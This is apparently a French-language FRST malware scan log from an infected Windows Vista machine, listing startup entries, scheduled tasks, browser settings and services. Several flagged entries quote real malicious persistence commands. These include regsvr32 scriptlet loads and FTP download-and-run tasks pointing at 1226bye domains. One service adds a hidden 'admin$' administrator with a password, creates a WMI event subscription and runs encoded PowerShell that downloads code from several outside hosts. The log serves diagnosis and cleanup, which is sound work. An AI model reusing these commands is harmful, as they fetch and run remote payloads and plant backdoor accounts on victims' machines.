(IBM -> IBM Corp.) [Fichier non signé] C:\Program Files\Trusteer\Rapport\bin\RapportService.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\conime.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Piriform Ltd -> Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Piriform Ltd -> Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(TeamViewer -> TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer_Service.exe
==================== Registre (Avec liste blanche) ===========================
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [242392 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2014-12-19] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [SSBkgdUpdate] => C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe [210472 2006-10-25] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM\...\Run: [OpwareSE4] => C:\Program Files\ScanSoft\OmniPageSE4\OpwareSE4.exe [79400 2007-02-04] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.exe [644696 2007-05-14] (Canon Inc. -> CANON INC.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [1603152 2007-04-03] (Canon Inc. -> CANON INC.)
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [Google Update] => C:\Users\françoise\AppData\Local\Google\Update\1.3.34.11\GoogleUpdateCore.exe [410920 2019-05-15] (Google Inc -> Google LLC)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [orangeinside] => C:\Users\françoise\AppData\Roaming\Orange\OrangeInside\OrangeInside.exe [1797360 2019-03-25] (Orange -> Orange)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [13594584 2018-06-24] (Piriform Ltd -> Piriform Ltd)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [AvastBrowserAutoLaunch_F5C52D2961A6248B8567D8EC64132959] => C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe [1027624 2018-06-13] (AVAST Software s.r.o. -> AVAST Software)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [uTorrent] => C:\Users\françoise\AppData\Roaming\uTorrent\uTorrent.exe [1996008 2019-05-10] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Policies\system: [DisableLockWorkstation] 0
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Policies\system: [DisableChangePassword] 0
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [879616 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-18\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [13594584 2018-06-24] (Piriform Ltd -> Piriform Ltd)
HKLM\...\Drivers32: [VIDC.I420] => C:\Windows\system32\lvcodec2.dll [204800 2005-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
HKLM\...\Drivers32: [MSVideo] => C:\Windows\system32\vfwwdm32.dll [56832 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{30C521FB-255B-46C8-9F0D-EE5AE371C9AA}] -> C:\Program Files\AVAST Software\Browser\Application\49.0.79.76\Installer\chrmstp.exe [2018-06-26] (AVAST Software s.r.o. -> AVAST Software)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files\Google\Chrome\Application\49.0.2623.112\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
IFEO\malivebox.exe: [Debugger] "C:\Program Files\AVAST Software\Avast Cleanup\autoreactivator.exe"
IFEO\skype.exe: [Debugger] "C:\Program Files\AVAST Software\Avast Cleanup\autoreactivator.exe"
IFEO\softwareupdate.exe: [Debugger] "C:\Program Files\AVAST Software\Avast Cleanup\autoreactivator.exe"
IFEO\uninstall.exe: [Debugger] "C:\Program Files\AVAST Software\Avast Cleanup\autoreactivator.exe"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Avast Cleanup Premium.lnk [2019-05-13]
ShortcutTarget: Avast Cleanup Premium.lnk -> C:\Program Files\AVAST Software\Avast Cleanup\TuneupUI.exe (AVAST Software s.r.o. -> AVAST Software) [Fichier non signé]
Startup: C:\Users\françoise\AppData\Roaming\Microsoft\Windows\Start Menu\Programmes\Programs\Startup\Canon IJ Status Monitor Canon MP240 series Printer.lnk [2019-05-16]
ShortcutAndArgument: Canon IJ Status Monitor Canon MP240 series Printer.lnk -> C:\Windows\system32\rundll32.exe => C:\Users\FRANOI~1\CNMSSC~2.DLL,SMStarterEntryPoint LPT1:;Canon MP240 series Printer;cnmss Canon MP240 series Printer (Local).dll;Canon IJ Status Monitor Canon MP240 series Printer.lnk
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Tâches planifiées (Avec liste blanche) =============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {0B986567-D5A0-466D-90CE-C6EA17AF48CB} - System32\Tasks\{2ACEEE12-CA2E-4ED0-9ED9-F350864625FF} => C:\Windows\system32\pcalua.exe -a C:\Users\françoise\Music\emule_emule_0.50a_francais_10876.exe -d C:\Users\françoise\Music
Task: {23A05E22-719B-4639-8ED4-E50D1BF847F6} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {272B0EB1-5B65-4E2B-B920-5CD7BDE8AB1D} - System32\Tasks\DriverMaxAgent => C:\Program Files\Innovative Solutions\DriverMax\drivermax.exe
Task: {277A1958-55E6-4D01-9881-DCB9E67CC30A} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {2F2E331F-0C3D-474F-8FFC-68325E35CD6D} - System32\Tasks\Avast Driver Updater Startup => C:\Program Files\Avast Driver Updater\Avast Driver Updater.exe [30443544 2018-07-18] (Avast Software s.r.o. -> AVAST Software)
Task: {3222E643-169C-40EE-9A60-C34E4CD7F4E8} - System32\Tasks\DriverMaxWelcome => C:\Program Files\Innovative Solutions\DriverMax\drivermax.exe
Task: {346BEEC7-9FDD-454A-AFC5-D12954CCE041} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2762968 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
Task: {39BC81B2-D425-470C-830B-A2A3E0C91385} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-02-12] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {3E04B49A-6384-4D28-B49D-43D32A70311F} - System32\Tasks\Microsoft\Windows\orangeinside => C:\Users\françoise\AppData\Roaming\Orange\OrangeInside\OrangeInside.exe [1797360 2019-03-25] (Orange -> Orange)
Task: {5CE15FEB-54CD-4D3C-AE35-DE660545EEAA} - System32\Tasks\SafeZone scheduled Autoupdate 1458889759 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {5E251469-0255-4DFC-A6DD-4636B300949C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [13594584 2018-06-24] (Piriform Ltd -> Piriform Ltd)
Task: {67D47C43-8EE6-48D8-B3B2-A2C82F6FB4AF} - System32\Tasks\Microsoft\Windows\orangeinstaller => C:\Program Files\Orange\Orange Installer\OrangeInstaller.exe [476760 2015-01-19] (Orange -> ) [Fichier non signé]
Task: {6BDADB0C-EA57-4C4F-B5EA-7E5102862C78} - System32\Tasks\NCH Software\ExpressZipSevenDays => C:\Program Files\NCH Software\ExpressZip\ExpressZip.exe
Task: {7D9D1F80-7C72-4799-A02F-0A9ED17916F4} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\system32\Macromed\Flash\FlashUtil32_32_0_0_192_pepper.exe [1452600 2019-05-15] (Adobe Inc. -> Adobe) [Fichier non signé]
Task: {873A6B77-CFA4-4905-B5CF-76A82D9C68BC} - \{817E9192-15EC-4FFE-A72F-DABBFC15959C} -> Pas de fichier <==== ATTENTION
Task: {8FDBF865-E536-48B6-AA6C-DC481CB90BDA} - System32\Tasks\DriverMax Notification => C:\Program Files\Innovative Solutions\DriverMax\drivermax.exe
Task: {97109F3F-5BA3-4BAD-82AE-2DB1B731736B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [153168 2018-10-23] (Google Inc -> Google Inc.)
Task: {9780B131-4D91-4780-954E-F2E4E95D39C6} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-06-26] (AVAST Software s.r.o. -> AVAST Software) <==== ATTENTION
Task: {983A22A5-92DC-4D9A-9153-0968803E05FD} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-451813890-3602019613-3621138349-1000UA => C:\Users\françoise\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc -> Google Inc.)
Task: {A375B2A1-7F8C-414C-A964-DCEAF1E4836A} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {A478E9B7-5E38-4215-9236-BE479ADFCFB2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [563000 2015-08-27] (Apple Inc. -> Apple Inc.)
Task: {A55847CA-AE49-4725-973E-FEDC55FDB08F} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-06-26] (AVAST Software s.r.o. -> AVAST Software) <==== ATTENTION
Task: {A7F6ADB5-BB0C-4F4C-BBAA-94D94C56BA34} - \{64DCAE36-32A2-4828-8C48-07BD5794F957} -> Pas de fichier <==== ATTENTION
Task: {ADA0EF61-0724-4B9D-82E8-6609DDF5823F} - System32\Tasks\Avast Cleanup Update => C:\Program Files\AVAST Software\Avast Cleanup\TUNEUpdate.exe [1659000 2019-05-13] (AVAST Software s.r.o. -> AVAST Software) [Fichier non signé]
Task: {C20ECECA-8FFD-40B2-B461-D3A11445234E} - System32\Tasks\avastBCLRestartS-1-5-21-451813890-3602019613-3621138349-1000 => C:\Program Files\Mozilla Firefox\firefox.exe
Task: {C31A9A93-E78F-4F43-BB24-82C25C1EF5B5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-05-15] (Adobe Inc. -> Adobe) [Fichier non signé]
Task: {D0A78623-4791-415C-81EB-148368A041D4} - System32\Tasks\Application Starter - 8882161c434ab0fd43dca37f474f4351 => C:\Program Files\Innovative Solutions\DriverMax\innostp.exe
Task: {D16F6C4B-6464-4B3E-9FB5-03F581FB2830} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [153168 2018-10-23] (Google Inc -> Google Inc.)
Task: {D30B5003-7484-40B4-B904-E847C84CC77E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-451813890-3602019613-3621138349-1000Core => C:\Users\françoise\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc -> Google Inc.)
Task: {EEB404EA-E9DE-4236-806D-30C4A1CD81FA} - System32\Tasks\{DBF0312E-896C-4AA5-82F7-0E48DBF36528} => C:\Windows\system32\pcalua.exe -a K:\InstallTomTomHOME.exe -d K:\
Task: {F5B03916-A23B-4EE0-916C-95E8D4B6B617} - System32\Tasks\maLivebox => C:\Program Files\Orange\ma Livebox\maLivebox.exe [146704 2017-02-07] (Orange -> Orange) [Fichier non signé]
Task: {FB629BE2-5125-4659-B018-D929EB96107E} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
Task: C:\Windows\Tasks\Avast Driver Updater Startup.job => C:\Program Files\Avast Driver Updater\Avast Driver Updater.exe
==================== Internet (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{86398058-6e11-4b3f-8997-c7140cc09ad5} <==== ATTENTION (Restriction - IP)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704 2011-08-30] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{1BD299F8-4997-4407-95AD-7E5F67B163F7}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{76E74176-2E6B-4D36-B45C-00E50F93D500}: [DhcpNameServer] 192.168.1.1
HKLM\System\...\Parameters\PersistentRoutes: [0.0.0.0,0.0.0.0,192.168.1.1,1]
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.packardbell.com/rdr.aspx?b=ACPW&l=040c&s=1&o=vp32&d=1013&m=imedia_a4730_fr
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.packardbell.com/rdr.aspx?b=ACPW&l=040c&s=1&o=vp32&d=1013&m=imedia_a4730_fr
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://r.orange.fr/r/Oodc_oi_odc?ref=O_OI_defaultPage_IEe32_wvistae32_odc
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-451813890-3602019613-3621138349-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll [2007-06-08] (Microsoft Corporation -> Microsoft Corporation)
FireFox:
========
FF ProfilePath: C:\Users\françoise\AppData\Roaming\TomTom\HOME\Profiles\n1j5dpk5.default [2018-12-23]
FF NetworkProxy: TomTom\HOME\Profiles\n1j5dpk5.default -> type", 4
FF Extension: (Emulator) - C:\Users\françoise\AppData\Roaming\TomTom\HOME\Profiles\n1j5dpk5.default\Extensions\Navcore.9.510.1234792@tomtom.com [2017-12-10] [Legacy] [non signé]
FF ProfilePath: C:\Users\françoise\AppData\Roaming\Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862 [2019-05-17]
FF Homepage: Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862 -> hxxps://r.orange.fr/r/Oodc_oi_odc?ref=O_OI_defaultPage_FFe32_wvistae32_odc
FF NewTab: Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862 -> hxxp://www.bing.com/?pc=COS2&ptag=D050219-A9FCDBB39EF&form=CONMHP&conlogo=CT3335799
FF Extension: (IBM Security Rapport) - C:\Users\françoise\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\rapportext@trusteer.com.xpi [2018-03-27] [UpdateUrl:hxxps://clients2.google.com/service/update2/crx]
FF Extension: (To Google Translate) - C:\Users\françoise\AppData\Roaming\Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862\Extensions\jid1-93WyvpgvxzGATw@jetpack.xpi [2019-04-04]
FF Extension: (Avast Online Security) - C:\Users\françoise\AppData\Roaming\Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862\Extensions\wrc@avast.com.xpi [2019-04-30]
FF SearchPlugin: C:\Users\françoise\AppData\Roaming\Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862\searchplugins\bing-lavasoft-ff59.xml [2019-05-02]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2015-01-27] [Legacy] [non signé]
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1234204.dll [2018-06-06] (Adobe Systems, Inc.) [Fichier non signé]
FF Plugin: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files\Google\Picasa3\npPicasa3.dll [2014-08-13] (Google Inc -> Google, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50906.0\npctrl.dll [2017-03-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [Pas de fichier]
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-16] (Google Inc -> Google LLC)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-16] (Google Inc -> Google LLC)
FF Plugin: @videolan.org/vlc,version=2.1.0 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\françoise\AppData\Local\Google\Chrome\User Data\Default [2019-05-04]
CHR HKLM\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswwebrepchrome-sp.crx
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx
CHR HKLM\...\Chrome\Extension: [nladljmabboanhihfkjacnnkgjhnokhj] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-451813890-3602019613-3621138349-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
S3 AdobeFlashPlayerUpdateSvc; C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-05-15] (Adobe Inc. -> Adobe) [Fichier non signé]
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6799632 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R2 Ati External Event Utility; C:\Windows\system32\Ati2evxx.exe [655360 2008-03-09] (Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.)
S2 avast; C:\Program Files\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-06-26] (AVAST Software s.r.o. -> AVAST Software)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [324000 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R2 avast! Firewall; C:\Program Files\AVAST Software\Avast\afwServ.exe [338632 2019-02-26] (AVAST Software s.r.o. -> AVAST Software)
S3 avastm; C:\Program Files\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-06-26] (AVAST Software s.r.o. -> AVAST Software)
R2 CleanupPSvc; C:\Program Files\AVAST Software\Avast Cleanup\TuneupSvc.exe [10227280 2019-04-16] (AVAST Software s.r.o. -> AVAST Software) [Fichier non signé]
S4 Dedicarz Service; C:\Program Files\Orange\ma Livebox\dedicarz\DedicarzService.exe [1970544 2014-09-15] (FRANCE TELECOM -> ) [Fichier non signé]
R2 ETService; C:\Program Files\Packard Bell\Packard Bell Recovery Management\Service\ETService.exe [24576 2008-07-16] () [Fichier non signé]
R2 ezSharedSvc; C:\Windows\System32\ezsvc7.dll [129992 2008-02-03] (EasyBits Software AS -> EasyBits Sofware AS) [Fichier non signé]
S3 FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2008-12-16] (Macrovision Europe Ltd.) [Fichier non signé]
S4 IJPLMSVC; C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE [101528 2007-04-13] (Canon Inc. -> ) [Fichier non signé]
S2 Orange update Core Service; C:\Program Files\Orange\OrangeUpdate\Service\OUCore.exe [1082016 2012-10-05] (FRANCE TELECOM -> France Telecom SA)
R2 RapportMgmtService; C:\Program Files\Trusteer\Rapport\bin\RapportMgmtService.exe [5243208 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S4 SkypeUpdate; C:\Program Files\Skype\Updater\Updater.exe [317400 2017-04-05] (Skype Software Sarl -> Skype Technologies) [Fichier non signé]
R2 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [743688 2015-05-21] (DEVGURU CO LTD -> DEVGURU Co., LTD.)
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
S2 BGVJ; cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll [X] <==== ATTENTION
